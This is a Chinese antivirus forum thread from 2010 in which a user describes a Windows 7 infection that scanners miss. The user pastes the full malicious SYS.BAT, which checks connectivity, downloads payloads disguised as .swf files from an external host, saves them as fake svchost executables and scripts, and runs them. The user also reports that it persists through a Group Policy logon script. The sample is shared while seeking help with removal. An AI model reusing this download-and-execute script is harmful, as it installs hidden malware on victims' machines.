开机后有个问题还有这几个文件杀不出来 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛企业产品讨论区 瑞星2011版公测专区 瑞星杀毒软件（RAV）2011 开机后有个问题还有这几个文件杀不出来

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

开机后有个问题还有这几个文件杀不出来

小剑师2 初生襁褓狮帖子:3 注册: 2007-04-10 来自:	发表于： 2010-08-21 22:02 \| 显示全部短消息资料字号：小中大 1楼开机后有个问题还有这几个文件杀不出来机器最近中了什么病毒开机后资源管理器中查看会有cmd.exe conhost.exe ping.exe 结束cmd后就都没了系统是;WINDOWS7 我原来用360杀毒扫也没提示出什么来今天换了瑞星2011测试版升级后也没扫出什么问题来但装了2011后，我开机马上点资源管理器会假死卡住大概1分钟又恢复了右下角第一次提示了个资源管理器对瑞星什么限制后来就不出这个了但是点资源管理器还是会假死1分钟左右晚上我仔细看了下那个cmd.exe 是在windws/INF/SYS.BAT调用的 ping.exe 地址是www.google.com 我一般都是结束这些后才开始拨号的，我注意了下直接拨号之后 ping通之后马上变成了一个下载这时候瑞星就提示木马了用户系统信息：Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQPinyinSetup 614; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
小剑师2 初生襁褓狮帖子:3 注册: 2007-04-10 来自:	分享到：

小剑师2 初生襁褓狮帖子:3 注册: 2007-04-10 来自:	发表于： 2010-08-21 22:03 \| 显示全部短消息资料字号：小中大 2楼回复：开机后有个问题还有这几个文件杀不出来 sys.bat 还有几个vbs文件 bat里是这么写的： @Echo Off Del /f /s /q /a %SystemRoot%\Web\svchst.exe :Next Del /f /s /q /a %SystemRoot%\Web\svchst.bat :Next Del /f /s /q /a %SystemRoot%\Web\svchst.vbs :Next Del /f /s /q /a %SystemRoot%\Web\svchost.vbs :Next Del /f /s /q /a %SystemRoot%\Web\svchost.bat :Next Del /f /s /q /a %SystemRoot%\Web\svchost.exe :Next Del /f /s /q /a %SystemRoot%\Web\svchost1.bat :Next Del /f /s /q /a %SystemRoot%\Web\svchost1.exe :Next ping www.google.com &&Goto ok Goto End :ok %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201001.swf %SystemRoot%\Web\svchst.vbs :Next %SystemRoot%\inf\shijian.vbs :Next %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201002.swf %SystemRoot%\Web\svchst.bat :Next %SystemRoot%\inf\shijian.vbs :Next %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201003.swf %SystemRoot%\Web\svchst.exe :Next %SystemRoot%\inf\shijian.vbs :Next start %SystemRoot%\Web\svchst.vbs :Next %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201004.swf %SystemRoot%\Web\svchost.vbs :Next %SystemRoot%\inf\shijian.vbs :Next %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201005.swf %SystemRoot%\Web\svchost.bat :Next %SystemRoot%\inf\shijian.vbs :Next %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201006.swf %SystemRoot%\Web\svchost.exe :Next %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201007.swf %SystemRoot%\Web\svchost1.bat :Next %SystemRoot%\inf\shijian.vbs :Next %SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201008.swf %SystemRoot%\Web\svchost1.exe :Next %SystemRoot%\inf\shijian.vbs :Next start %SystemRoot%\Web\svchost.vbs Exit :End ping www.google.com &&Goto ok Goto End
小剑师2 初生襁褓狮帖子:3 注册: 2007-04-10 来自:

小剑师2 初生襁褓狮帖子:3 注册: 2007-04-10 来自:	发表于： 2010-08-21 22:17 \| 显示全部短消息资料字号：小中大 3楼回复：开机后有个问题还有这几个文件杀不出来把那个东西删了后开始就弹出来一个找不到那个东西看了下地址是 C:\windows\system32\GroupPolicy\User\Scripts\Logon
小剑师2 初生襁褓狮帖子:3 注册: 2007-04-10 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT